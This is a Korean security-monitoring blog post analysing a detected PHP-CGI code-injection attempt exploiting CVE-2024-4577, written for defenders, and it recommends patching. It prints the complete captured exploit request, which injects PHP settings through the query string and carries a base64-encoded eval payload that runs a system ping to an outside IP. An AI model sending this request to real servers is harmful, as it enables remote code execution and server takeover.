공격설명
응용 프로그램에 코드를 악의적으로 삽입하려는 공격 시도가 탐지되었습니다.
Code Injection 공격으로 삽입된 코드는 데이터베이스 무결성을 손상시키거나 개인 정보 보호 속성, 보안 및 데이터 정확성까지 손상시킬 수 있습니다.
또한 데이터 손실, 액세스 거부 등을 초래할 수 있으며 호스트 탈취로 이어질 수 있는 공격으로, 시스템 해킹 또는 정보 획득, 권한 상승 또는 시스템에 대한 무단 액세스를 위한 크래킹에서 널리 사용됩니다.
해당 구문이 동작할 경우, 공격자는 서버 측에서 임의의 함수를 실행하여 대상 서버의 민감한 정보를 탈취하거나 시스템을 제어할 수 있습니다.
공격구문
POST /php-cgi/php-cgi.exe?�d+cgi.force_redirect=0+�d+disable_functions=""+�d+allow_url_include=1+�d+auto_prepend_file=php://input HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
<?php echo eval(base64_decode('ZWNobyAnW01dJzsgc3lzdGVtKCdwaW5nIC1sIDYwIC1uIDYgMTkzLjMyLjE2Mi4zNCcpOyBlY2hvICdbUF0nOw')); ?>
탐지근거
<?php echo eval(base64_decode('ZWNobyAnW01dJzsgc3lzdGVtKCdwaW5nIC1sIDYwIC1uIDYgMTkzLjMyLjE2Mi4zNCcpOyBlY2hvICdbUF0nOw')); ?>
PHP 원격 코드 실행 취약점
CVE-2024-4577 취약점은 PHP의 CGI 모드에서 Windows의 “Best-Fit” 기능이 잘못된 인코딩 변환을 일으켜 발생하는 원격 코드 실행(RCE) 취약점이다. Windows 운영체제에서 PHP가 CGI 모드로 실행되거나 XAMPP와 같은 개발 환경에서 기본 설정으로 PHP 바이너리가 노출된 경우에 취약하다. 이 취약점을 악용하면 공격자는 조작된 URL 매개변수를 통해 임의의 코드를 실행할 수 있다.
현재까지 확인된 바에 따르면, 특정 시스템 로캘(중국어 번체 및 간체, 일본어)을 사용하는 경우에 익스플로잇이 가능한 것으로 알려져 있으나, 다른 로캘도 상황에 따라 영향을 받을 가능성을 배제할 수 없으므로, 패치 버전으로 업데이트할 것을 권고한다.
'보안관제 이벤트 분석' 카테고리의 다른 글
[보안관제] SQL Injetion DB 데이터 추출 공격 탐지 (0) | 2024.09.12 |
---|---|
[보안관제] 정수타입 SQL 인증우회 공격 탐지 (0) | 2024.09.12 |
[보안 관제] Application Vulnerability (0) | 2024.08.30 |
[보안관제] 비정상 HTTP 요청 탐지(Invalid HTTP) (0) | 2024.08.30 |
[보안관제] Code Injection (0) | 2024.08.30 |